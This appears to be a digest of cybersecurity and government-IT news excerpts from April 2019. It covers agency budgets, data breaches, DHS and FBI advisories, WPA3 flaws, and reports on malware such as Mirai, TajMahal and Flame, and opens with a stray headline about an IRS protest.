Protesters bring inflatable Trump chicken to IRS building to demand ...
The Hill
We're HERE at the IRS Building to demand Trump's tax returns! pic.twitter.com/L23w3Fucam ... Mark Meadows (N.C.) and Jim Jordan (Ohio), who have accused their Democratic ...
Officials discuss the challenges and opportunities of tax administration in a more globalized and technologically advanced world, addressing data analytics and service delivery.
Federal
News Network
April 12,
2019
The
Government Accountability Office is on track to achieve its optimal workforce
capacity of 3,250 full-time employees this year, but it’s still having trouble
keeping up with the quantity of lawmaker requests around new technologies and
cybersecurity. Comptroller General of the United States and head of the GAO
Gene Dodaro told the Senate Appropriations Legislative Branch subcommittee that
those are two of GAO’s four major priorities for 2020, where it needs to
increase capacity to meet rising demand. The agency requested a funding
increase of $57.8 million more than it received in fiscal 2019, for a total of
$647.6 million, in order to build these capacities. Dodaro reminded lawmakers
that in 2018, actions on GAO recommendations saved the government $75.1
billion, a return on investment of more than $124 for every $1 GAO received in
funding
FCW
April 11,
2019
Navy
Secretary Richard Spencer says adding a new assistant secretary for
cybersecurity and tightening contractors' security practices are top priorities
for 2020. Spencer told Congress April 10 that a new assistant secretary for
cyber would help centralize the service's current efforts and build an
implementable cybersecurity policy structure. "When it comes to a fifth
assistant secretary [for cyber]," Spencer told the House Armed Services
Committee, "that will be a compilation of what we have in the organization
already at the secretariat level." Spencer didn't provide many details on
how the new position would work but expressed concern over security gaps in the
defense industrial base.
Gov Info
Security
Over the
last four years, the Government Accountability Office has made hundreds of
recommendations to the Department of Health and Human Services for improving
its operations that have not been implemented. In a March 28 letter and report
sent to HHS, GAO notes that among dozens of unimplemented "high
priority" recommendations are four on health information technology and
cybersecurity. "The nation's critical infrastructure provides the
essential services - including healthcare - that underpin American society. The
infrastructure relies extensively on computerized systems and electronic data
to support its missions," GAO writes. "However, serious cybersecurity
threats to the infrastructure continue to grow and represent a significant
national security challenge. Additionally, recent data breaches have
highlighted the importance of ensuring the security of health information,
including Medicare beneficiary data." Such critical data is created,
stored, and used by a wide variety of entities, such as healthcare providers,
insurance companies, financial institutions, researchers and others, GAO notes.
Nextgov
A
bipartisan bill introduced on Monday would require the Homeland Security
Department to fund efforts by state and local governments to boost their cyber
defenses. The Cyber Resiliency Act would create a federal grant program to
support cybersecurity upgrades for governments that often lack the resources to
fund their own endeavors. It would also mandate states that participate in the
program work to improve recruitment and retention in their cyber workforce. “As
cyberattacks increase in frequency and gravity, we must ensure that our
nation—from our local governments on up—is adequately prepared to protect
public safety and combat cyber threats,” said Sen. Mark Warner, D-Va., who
cosponsored the bill with Sen. Cory Gardner, R-Colo. “Nearly 70 percent of states
have reported that they lack adequate funding to develop sufficient
cybersecurity. This bill will aim to mitigate that need by providing grants to
state and local jurisdictions so that they are better prepared to take on these
emerging challenges.” Reps. Derek Kilmer, D-Wash., and Michael McCaul, R-Texas,
introduced companion legislation in the House. A similar bill was introduced
during the last Congress but never made it out of committee.
Gov Info
Security
The lack of
a strong security culture at Equifax - especially compared to its two main
competitors - was a key factor contributing to its 2017 data breach that
exposed the personal records of 145 million Americans, according to a 71-page
Congressional report. The newly released report from the U.S. Senate Permanent
Subcommittee on Investigations concluded, much like an earlier the Government
Accountability Office report, that Equifax failed to follow its own
cybersecurity policies, including those spelling out how and when to patch
critical software vulnerabilities. Company executives did not prioritize
security, and many key decisions were left to lower-level IT employees, the new
report concludes. "Based on this investigation, the subcommittee concludes
that Equifax's response to the March 2017 cybersecurity vulnerability that
facilitated the breach was inadequate and hampered by Equifax's neglect of
cybersecurity," the report states. "Equifax's shortcomings are
longstanding and reflect a broader culture of complacency toward cybersecurity
preparedness." The report also notes that due to missing documents and
internal chat logs, a full understanding of what happened could not be
achieved.
ADMINISTRATION
CyberScoop
April 12,
2019
The
Department of Homeland Security on Friday alerted the public to a vulnerability
in multiple virtual private network applications that could give a hacker
access to other apps running on a VPN connection. The flaw involves the
insecure storage of cookies in memory or in log files, and affects enterprise
VPN apps made by Cisco, F5 Networks, Palo Alto Networks, and Pulse Secure.
Other vendors could be affected because the configuration issue is likely
“generic” to other VPN apps, according to an advisory cited by DHS from
Carnegie Mellon University’s CERT Coordination Center. “If an attacker has
persistent access to a VPN user’s endpoint or exfiltrates the cookie using
other methods, they can replay the session and bypass other authentication
methods,” CERT CC said. “An attacker would then have access to the same
applications that the user does through their VPN session.” While Palo Alto
Networks had patched its VPN product, the other vendors had not, according to
CERT CC. The added attention brought by the advisory could change that.
StateScoop
April 12,
2019
North
Dakota Gov. Doug Burgum signed a bill Friday making his state’s Information
Technology Department the first in the country to manage cybersecurity
operations across all of the state’s public organizations, including local
governments, schools, courts and the state legislature. The law’s enactment
leaves ITD with the broadest cybersecurity mission of any state government IT
division in the country. North Dakota’s shared network, called STAGEnet, hosts
more than 250,000 users in approximately 400 public-sector organizations across
the state. Burgum, a former software executive who sold his company to
Microsoft in 2001 for $1.1 billion, said in a press release that the change
will help the state protect the state’s network amid the “growing nature of
cybersecurity threats.”
The New
York Times
The
WikiLeaks founder Julian Assange was arrested on Thursday in London to face a
charge in the United States of conspiring to hack into a Pentagon computer network
in 2010, bringing to an abrupt end a seven-year saga in which he had holed up
in Ecuador’s embassy in Britain to avoid capture. The Ecuadorean government
suspended the citizenship it had granted Mr. Assange and evicted him on
Thursday, clearing the way for his arrest. His hosts had displayed growing
impatience, listing grievances including recent WikiLeaks releases they said
interfered with other states’ internal affairs and personal discourtesies, like
the failure of Mr. Assange to clean the bathroom and look after his cat. A
bedraggled and shackled Mr. Assange, 47, was dragged out of the embassy. At a
court hearing, a judge swiftly found him guilty of jumping bail, and he was
detained partly in connection with an American extradition warrant. Mr. Assange
indicated that he would fight extradition, and legal experts said that process
could take years. He is likely to argue that the case is politically motivated
rather than driven by legitimate legal concerns.
Wired
April 11,
2019
This week
kicked off a new, chaotic era at the Department of Homeland Security, where the
only certainty seems to be the president’s obsession with immigration. As
former Customs and Border Protection commissioner and prominent
family-separation advocate Kevin McAleenan takes over as acting secretary, it’s
fair to wonder what will happen to the rest of DHS’ many essential
responsibilities. The shakeup began last week, when President Trump announced
he was withdrawing his nominee to head Immigration and Customs Enforcement,
Ronald Vitiello, saying, “We’re going in a tougher direction.” Then on Sunday
he ousted former secretary Kirstjen Nielsen, after months of rumors that he was
unhappy with her performance. Secret Service director Randolph Alles and DHS
undersecretary Claire Grady are also out, and there may still be more to come.
But DHS’ mandate goes far beyond immigration, to concerns like cybersecurity,
counterterrorism, monitoring critical infrastructure, border privacy, and the
development of science and technology in defense of the country. While Trump’s
Homeland Security purge may not mean an immediate danger of those areas being
neglected, former government officials worry about the long-term consequences
of the hollowing out and restructuring of DHS.
FCW
April 11,
2019
The Air
Force is rolling out seven new competitive career categories for officers that
will include cyber, intelligence, and space as a way to boost promotion,
training and talent retention, the service announced April 11. "There
needs to be different paths for the development of our career fields," Lt.
Gen. Brian Kelly, Air Force deputy chief of staff for manpower, personnel, and
services, told reporters at a media roundtable event. "The things that we
value and the things that we need to emphasize between career fields might not
always be the same." The initiative, which has been underway for nearly
two years, will allow officers to compete for promotion against others in their
career field who have similar duties and skills, rather than across the entire
Air Force. "We can't have a one-size-fits-all developmental path,"
Kelly said, "to reach our potential in all of these areas." The new
categories include cybersecurity, space, intelligence and others yet to be
named. They're expected to debut later this spring at the earliest, Kelly said.
Ars
Technica
April 10,
2019
A joint
intelligence bulletin (JIB) has been issued by the Department of Homeland
Security and Federal Bureau of Investigation to state and local authorities
regarding Russian hacking activities during the 2016 presidential election.
While the bulletin contains no new technical information, it is the first
official report to confirm that the Russian reconnaissance and hacking efforts
in advance of the election went well beyond the 21 states confirmed in previous
reports. As reported by the intelligence newsletter OODA Loop, the JIB stated
that, while the FBI and DHS "previously observed suspicious or malicious
cyber activity against government networks in 21 states that we assessed was a
Russian campaign seeking vulnerabilities and access to election
infrastructure," new information obtained by the agencies "indicates
that Russian government cyber actors engaged in research on—as well as direct
visits to—election websites and networks in the majority of US states."
While not providing specific details, the bulletin continued, "The FBI and
DHS assess that Russian government cyber actors probably conducted research and
reconnaissance against all US states’ election networks leading up to the 2016
Presidential elections."
Nextgov
The
Internal Revenue Service, which has struggled for years to get a handle on the
criminal theft of taxpayer identity information, on Monday released encouraging
numbers on results of its Security Summit partnership with states and industry.
“At a time when many in the private sector continue to struggle with these
issues, the tax community has made major progress working together to stop
identity theft and refund fraud,” Internal Revenue Commissioner Chuck Rettig
said. “In 2018, our partnership protected more taxpayers and more tax dollars
from tax-related identity theft.” The partnership with state tax agencies and
private-sector cyber-specialists, launched in 2015, created a Theft Tax Refund
Fraud Information Sharing and Analysis Center that now consists of 65 groups,
the IRS noted. It has been tackling a problem that threatens individuals,
companies and tax preparers, at a time when the agency’s programs to thwart
identity theft have appeared on the high-risk list of the Government
Accountability Office.
Fifth
Domain
U.S. Cyber
Command focuses on deterring cyberthreats from impacting the homeland, but
could hold less direct authority if an internal threat targets the critical
infrastructure of a state. That’s why 40 states have representatives in an
annual large-scale cyber exercise that kicked off late last week. Cyber Shield
19, which runs until April 20, brings together members of the National Guard,
who answer to the governors of their respective states, and has them work with
industry to improve incident response to cyber events. “The purpose is to
develop and train internal defensive measures, incident response, coordinate
train and assist activities,” Brig. Gen. Jeffrey Burkett, vice director of
domestic operations for the National Guard Bureau, told reporters April 9
during a briefing at the Pentagon. “It’s a collective training event for us. It
will enhance our war-fighting skills and that’s very important to us.”
The
Minneapolis Star Tribune
April 9,
2019
A data
breach last year at the state agency that oversees Minnesota’s health and
welfare programs may have exposed the personal information of approximately
11,000 individuals. The state Department of Human Services (DHS) notified
lawmakers Tuesday that an employee’s e-mail account was compromised as a result
of a cyberattack on or about March 26, 2018. A hacker unlawfully logged into a
state e-mail account of a DHS employee and used it to send two e-mails to one
of the employee’s co-workers, asking that co-worker to pay an “invoice” by
wiring money. The agency has no evidence that personal information contained in
the hacked e-mail account was “viewed, downloaded or misused in any way,” Human
Services Commissioner Tony Lourey said in a letter to legislative leaders on
Tuesday. Even so, the hacker would have had the ability to obtain some of the
account’s contents during the cyberattack, officials said.
INDUSTRY
NPR
April 12,
2019
Technology
theft and other unfair business practices originating from China are costing
the American economy more than $57 billion a year, White House officials
believe, and they expect that figure to grow. Yet an investigation by NPR and
the PBS television show Frontline into why three successive administrations
failed to stop cyberhacking from China found an unlikely obstacle for the
government — the victims themselves. In dozens of interviews with U.S.
government and business representatives, officials involved in commerce with
China said hacking and theft were an open secret for almost two decades,
allowed to quietly continue because U.S. companies had too much money at stake
to make waves. Wendy Cutler, who was a veteran negotiator at the Office of the U.S.
Trade Representative, says it wasn't just that U.S. businesses were hesitant to
come forward in specific cases. She says businesses didn't want the trade
office to take "any strong action." "We are not as effective if
we don't have the U.S. business community supporting us," she says.
"Looking back on it, in retrospect, I think we probably should have been
more active and more responsive. We kind of lost the big picture of what was
really happening."
Reuters
April 12,
2019
Norsk
Hydro, one of the world’s largest aluminum makers, will postpone its
first-quarter earnings report by more than a month as it struggles to recover
from a March cyber attack, the company said on Friday. Hydro now aims to
publish its results on June 5, five weeks later than planned, as it tries to
gain access to administrative systems for reporting, billing and invoicing that
were blocked by hackers demanding a ransom. The company has maintained it will
not pay to regain access to its computers and servers, preferring instead to
repair data from backup systems. “The revised date is conditional upon the
planned timeline for restoring operational and reporting systems,” Hydro said
in a statement. “With 35,000 employees, operations in 40 countries on all
continents and several thousand servers in the company, full recovery is a
complex and time-consuming process,” Chief Information Officer Jo De Vliegher
said. “We are well on our way, but it will take time before we are fully back
to normal IT operations,” he added.
CyberScoop
April 12,
2019
A popular
form of crowdsourcing might have a problem with the size of its crowd. Most of
the high-value digital security vulnerabilities reported to bug-bounty programs
are found by just a fraction of the freelance researchers who participate in
those contests, recent reports show, suggesting that there are not enough
skilled bounty hunters to handle the available work. The trend has big
implications for an industry that has come to expect regular growth over the
past half-decade. For the companies, it means their customers — corporations
such as Fiat Chrysler, LinkedIn, Starbucks and others — are paying to hear
about lots of low-severity bugs while more critical problems potentially remain
undiscovered. The latest numbers come from the 2019 Hacker Report by HackerOne,
one of the leading bug bounty platforms along with Bugcrowd and Synack.
ZDNet
April 11,
2019
Google
announced today that Gmail has become the first major email provider to support
two new security standards, namely MTA-STS and TLS Reporting. Both are
extensions to the Simple Mail Transfer Protocol (SMTP), the protocol through
which all emails are sent today. The purpose of MTA-STS and TLS Reporting is to
help email providers establish cryptographically secure connections between
each other, with the main goal of thwarting SMTP man-in-the-middle attacks.
SMTP man-in-the-middle attacks are a major problem for today's email landscape,
where rogue email server operators can intercept, read, and modify the contents
of people's emails. The two new standards will prevent this by allowing
legitimate email providers to create a secure channel for exchanging emails.
Ars Technica
April 10,
2019
Sixteen
months ago, researchers reported an unsettling escalation in hacks targeting
power plants, gas refineries, and other types of critical infrastructure.
Attackers who may have been working on behalf of a nation caused an operational
outage at a critical-infrastructure site after deliberately targeting a system
that prevented health- and life-threatening accidents. There had been
compromises of critical infrastructure sites before. What was unprecedented in
this attack—and of considerable concern to some researchers and critical
infrastructure operators—was the use of an advanced piece of malware that
targeted the unidentified site’s safety processes. Such safety instrumented
systems (SIS) are a combination of hardware and software that many critical infrastructure
sites use to prevent unsafe conditions from arising. When gas fuel pressures or
reactor temperatures rise to potentially unsafe thresholds, for instance, a SIS
will automatically close valves or initiate cooling processes to prevent
health- or life-threatening accidents. Now, researchers at FireEye—the same
security firm that discovered Triton and its ties to Russia—say they have
uncovered an additional intrusion that used the same malicious software
framework against a different critical infrastructure site. As was the case in
the first intrusion, the attackers focused most of their resources on the
facility’s OT, or operational technology, which are systems for monitoring and
managing physical processes and devices.
CyberScoop
April 10,
2019
It’s just
like the old saying: When you can’t hire them, offer to pay their student loan
debt. Microsoft, Mastercard and Workday announced this week they’ve teamed with
11 federal government agencies as part of a Cybersecurity Talent Initiative
meant to fill hundreds of thousands of open cybersecurity jobs. Graduating
college students can apply for a two-year placement in a security role at the
FBI, CIA or another agency. At the end of that two years they’ll be eligible
for a position at one of those three companies, which will pay up to $75,000 of
their student loan debt as part of their deal. The Cybersecurity Talent
Initiative appears to be unique in the way it offers student loan assistance,
but it’s hardly the only corporate effort meant to enhance an enterprise’s
security posture.
The Wall
Street Journal
April 9,
2019
DTE Energy
Co., PG&E Corp. and a municipal utility in Missouri broke rules designed to
protect the nation’s electric system from cyber and physical attacks and were
sanctioned by federal regulators, according to newly released documents and
people knowledgeable about the cases. Penalty cases are not uncommon, but what
is unusual is that the public is learning the operators’ identities. Most
violators’ names are kept confidential in a system designed to encourage
self-disclosure of infractions by the utilities.
Reuters
April 9,
2019
Yahoo has
struck a revised $117.5 million settlement with millions of people whose email
addresses and other personal information were stolen in the largest data breach
in history. The proposed class-action settlement made public on Tuesday was
designed to address criticisms of U.S. District Judge Lucy Koh in San Jose,
California. She rejected an earlier version of the accord on Jan. 28, and her
approval is still required. Koh said the original settlement was not
"fundamentally fair, adequate and reasonable" because it had no
overall dollar value and did not say how much victims might expect to recover.
She also said the legal fees appeared to be too high. Yahoo, now part of New
York-based Verizon Communications Inc, had been accused of being slow to
disclose three data breaches affecting about 3 billion accounts from 2013 to
2016.
Bloomberg
April 9, 2019
It helped
Mexico track down El Chapo, but it’s also been accused of assisting Saudi
Arabia spy on dissidents. Now NSO Group, hackers-for-hire likened to a private
intelligence service, has become a strain for two Wall Street banks that helped
fund a buyout of the Israel-based company last month. After struggling to find
buyers for a $500 million loan that they agreed to provide, Jefferies Financial
Group Inc. and Credit Suisse Group AG had to come up with the cash themselves
and are now unloading the debt at a steep discount, according to people with
knowledge of the matter. The banks were left holding the loan after increased
public scrutiny of NSO’s most high-profile product: a smartphone-hacking tool
known as Pegasus that has helped make the company hundreds of millions of
dollars from licensing it to foreign governments and intelligence agencies. In
recent weeks, NSO has sought to rebut accusations that Pegasus has been used by
countries to spy on dissidents, including from one Saudi citizen who claims the
software allowed the kingdom to monitor his communications with murdered
journalist Jamal Khashoggi.
CyberScoop
April 9,
2019
If hackers
managed to exploit vulnerabilities in widely used Verizon Fios routers, they
would have full control of a wireless home network and access to devices
connected to them, researchers said Tuesday. The new vulnerabilities, uncovered
by cybersecurity company Tenable, point to underlying security issues in
Verizon Fios Quantum Gateway routers, which are given to new customers unless
they opt out. In tinkering with his Fios router, Chris Lyne, a Tenable
researcher, showed how an attacker could change security settings on the router
or capture login requests sent through the device.
Ars Technica
April 9,
2019
Mirai, the
“botnet” malware that was responsible for a string of massive distributed
denial of service (DDoS) attacks in 2016—including one against the website of
security reporter Brian Krebs—has gotten a number of recent updates. Now,
developers using the widely distributed "open" source code of the
original have added a raft of new devices to their potential bot armies by
compiling the code for four more microprocessors commonly used in embedded
systems. Researchers at Palo Alto Networks’ Unit 42 security research unit have
published details of new samples of the Mirai botnet discovered in late
February. The new versions of the botnet malware targeted Altera Nios II,
OpenRISC, Tensilica Xtensa, and Xilinx MicroBlaze processors. These processors
are used on a wide range of embedded systems, including routers, networked
sensors, base band radios for cellular communications and digital signal
processors.
Wired
April 9,
2019
In March
2017, the Android security team was feeling pleased with itself. The group had
detected, analyzed, and neutralized a sophisticated botnet built on tainted
apps that all worked together to power ad and SMS fraud. Dubbed Chamois, the
malware family had already cropped up in 2016 and was being distributed both
through Google Play and third-party app stores. So the Android team started
aggressively flagging and helping to uninstall Chamois until they were sure it
was dead. Eight months later, though, in November 2017, Chamois roared back
into the Android ecosystem, more ferocious than before. By March 2018, a year
after Google thought it had been vanquished, Chamois hit an all-time high,
infecting 20.8 million devices. Now, a year after that zenith, the Android team
has whittled that number back down to fewer than 2 million infections. And at
the Kaspersky Security Analyst Summit in Singapore this week, Android security
engineer Maddie Stone is presenting a full post-mortem on how Google fought
back against Chamois—again—and how personal the rivalry became.
CyberScoop
April 9,
2019
At a time
when corporations are planning to blanket the heavens with high-tech hardware,
the space industry is responding with the creation of an information sharing
and analysis center — a nonprofit organization that helps to track cyberthreats
for member companies and related government agencies. The Space Information
Sharing and Analysis Center (S-ISAC) will be housed in Colorado Springs,
Colorado, within the National Cybersecurity Center, itself a nonprofit,
nongovernmental organization created to improve awareness about securing cyberspace.
S-ISAC has not released much public information about how it plans to
coordinate the space industry around its mission, but a news release from its
founding company — Kratos Defense and Security Solutions — says the ISAC was
created in response to long-recognized “information sharing gaps within the
cybersecurity and space community.”
INTERNATIONAL
AP
April 11,
2019
Spanish
Prime Minister Pedro Sánchez on Tuesday called on all political forces in the
country to back a new national cybersecurity fight against "attempts to
hack democracy and undermine citizens' trust in the political system." Spain's
April 28 general election is seen as a testing ground for new measures that the
European Union is adopting to shield elections to the European Parliament a
month later. The Europe-wide efforts include a "rapid alert system"
linking specialized coordination units in all EU member states and require
internet companies to share regular updates on their efforts to eradicate
disinformation campaigns. Spain joined the Europe-wide initiative in early
March, establishing a high-level unit to coordinate the fight against
cyberattacks and fake news. The experts report directly to Sánchez, who on
Tuesday equated disinformation to attacks on "the quality of
democracy."
CyberScoop
April 10,
2019
Department
of Homeland Security and FBI officials are warning industry about what they say
are new Trojan malware variants that North Korean-government-backed hackers
have deployed as part of their global operations. The variants employ proxy
applications to mask communications between the malicious programs and their
operators, DHS said in a report published Wednesday. When executed, the malware
collects information on the victim machine’s operating system and its system
time, and uses a public SSL certificate for secure communication with its
operators, the report said. DHS has dubbed the new malware HOPLIGHT. “This is
continuing our campaign to put pressure on the DPRK as well as helping network
defenders understand some of the tools and the capabilities that they are
using,” Jeanette Manfra, assistant director for cybersecurity at DHS’s
Cybersecurity and Infrastructure Security Agency, told CyberScoop.
The
Washington Post
April 9, 2019
he Czech
Republic’s highest court says a former justice minister violated the rights of
an alleged Russian hacker by allowing his extradition to the U.S. before a
separate asylum case was finalized. Yevgeniy Nikulin is accused of hacking
computers at LinkedIn, Dropbox and other American companies in 2012,
compromising the personal information of millions of Americans. The
Constitutional Court said Tuesday that then Justice Minister Robert Pelikan
allowed Nikulin’s extradition before his asylum request went through the court
system. Nikulin was later denied asylum. He was extradited to the U.S. in March
2018. Pelikan is no longer justice minister and won’t face any punishment.
Fifth Domain
April 8,
2019
NATO’s
cybersecurity arm is set to launch a four-day exercise April 9 that simulates
the response to hackers sowing chaos in a fictitious country conducting
national elections. The scenario places the country of Berylia in a
“deteriorating security situation” as people go to the polls, according to a
NATO statement. Hostile actors launch coordinated attacks against the country’s
civilian communications infrastructure, causing disruptions in water
purification systems, the power grid, 4G public safety networks and other
essential services. Civil unrest spreads as the attacks twist the public
perception of election results. The drill, dubbed Locked Shields 2019, is
billed as a “live-fire” event, which means all actions by six teams of
competing network defenders will have immediate effects in the game-like
environment.
CSO
April 8,
2019
An attacker claiming to be ISIS took control of the official email
account of the Saudi Embassy in the Netherlands in August, 2014 and sent emails
to more than a dozen embassies at The Hague demanding $50 million for ISIS, or
they would blow up a major diplomatic reception, documents seen by CSO reveal.
The attack compromised the Saudi embassy's non-classified computer network.
They deployed a garden-variety rootkit on the workstation of the ambassador’s
secretary and took over the embassy's official email account. No one was ever
formally held accountable, despite an internal investigation. Given the low
sophistication of the attack, experts tell CSO it's impossible to say whether
the attacker really was part of an organized effort by ISIS, a random
supporter, or a nation-state intelligence agency masquerading as ISIS for
motives unknown.
TECHNOLOGY
Ars Technica
April 11,
2019
The
next-generation Wi-Fi Protected Access protocol released 15 months ago was once
hailed by key architects as resistant to most types of password-theft attacks
that threatened its predecessors. On Wednesday, researchers disclosed several
serious design flaws in WPA3 that shattered that myth and raised troubling new
questions about the future of wireless security, particularly among low-cost
Internet-of-things devices. While a big improvement over the earlier and
notoriously weak Wired Equivalent Privacy and the WPA protocols, the current
WPA2 version (in use since the mid 2000s) has suffered a crippling design flaw
that has been known for more than a decade: the four-way handshake—a
cryptographic process WPA2 uses to validate computers, phones, and tablets to
an access point and vice versa—contains a hash of the network password. Anyone
within range of a device connecting to the network can record this handshake.
Short passwords or those that aren’t random are then trivial to crack in a
matter of seconds. One of WPA3’s most promoted changes was its use of
“Dragonfly,” a completely overhauled handshake that its architects once said
was resistant to the types of password guessing attacks that threatened WPA2
users. A research paper titled Dragonblood: A Security Analysis of WPA3’s SAE
Handshake disclosed several vulnerabilities in WPA3 that open users to many of
the same attacks that threatened WPA2 users.
Wired
April 9,
2019
It's not
every day that security researchers discover a new state-sponsored hacking
group. Even rarer is the emergence of one whose spyware has 80 distinct
components, capable of strange and unique cyberespionage tricks—and who's kept
those tricks under wraps for more than five years. In a talk at the Kaspersky
Security Analyst Summit in Singapore Wednesday, Kaspersky security researcher
Alexey Shulmin revealed the security firm's discovery of a new spyware
framework—an adaptable, modular piece of software with a range of plugins for
distinct espionage tasks—that it's calling TajMahal. The TajMahal framework's
80 modules, Shulmin says, comprise not only the typical keylogging and
screengrabbing features of spyware, but also never-before-seen and obscure
tricks. It can intercept documents in a printer queue, and keep track of
"files of interest," automatically stealing them if a USB drive is
inserted into the infected machine. And that unique spyware toolkit, Kaspersky
says, bears none of the fingerprints of any known nation-state hacker group.
CyberScoop
April 9,
2019
Flame, the
nation-state-developed malware kit that targeted computers in Iran, went quiet
after researchers exposed it in 2012. The attackers tried to hide their tracks
by scrubbing servers used to talk to infected computers. Some thought they had
seen the last of the potent malware platform. Flame’s disappearance “never sat
right with us,” said Juan Andres Guerrero-Saade and Silas Cutler, researchers
with Alphabet’s Chronicle. On Tuesday at the Kaspersky Security Analyst Summit
in Singapore, they showed that Flame hadn’t died, it had just been
reconfigured. Tracing early components of Flame, Guerrero-Saade and Cutler
found a new version of it that was likely used between 2014 and 2016. Flame 2.0
is “clearly built” from the original source code, but it has new measures aimed
at eluding researchers, they wrote in a paper. The discovery shows how good
source code dies hard, and that tracking its evolution can be a very long game
for researchers.
Wired
April 9,
2019
Over the
past few years, scammers have increasingly siphoned cash off of digital payment
networks, stealing hundreds of millions of dollars so far. Not only is the problem
hard to contain; new findings show that it's evolving and maturing, with new
types of ATM malware on the rise. Researchers at the Kaspersky Security Analyst
Summit in Singapore are presenting findings on Wednesday about a new wave of
payment system scams. Beyond so-called jackpotting attacks, which cause
individual ATMs to spit out money, hackers are manipulating ATM networks and
the digital authentication checks in the machines to cash out fraudulent
transfers they initiate around the globe. Hackers have hit a variety of
financial platforms—including Mexico's domestic money transfer system SPEI—in
payment systems frauds in recent years. But the majority of the scams target
the international payment network SWIFT, which transfers trillions of dollars per
day. Numerous notorious digital bank heists, like a whopping $81 million stolen
in Bangladesh in 2016 and $10 million stolen in Chile last year, have shown how
vulnerable digital payment networks can be. But attackers are now using the
same types of transaction manipulations in unexpected places, like ATM
networks, to get around new defenses while still using the same types of
strategies that have already raked in a steady stream of cash.
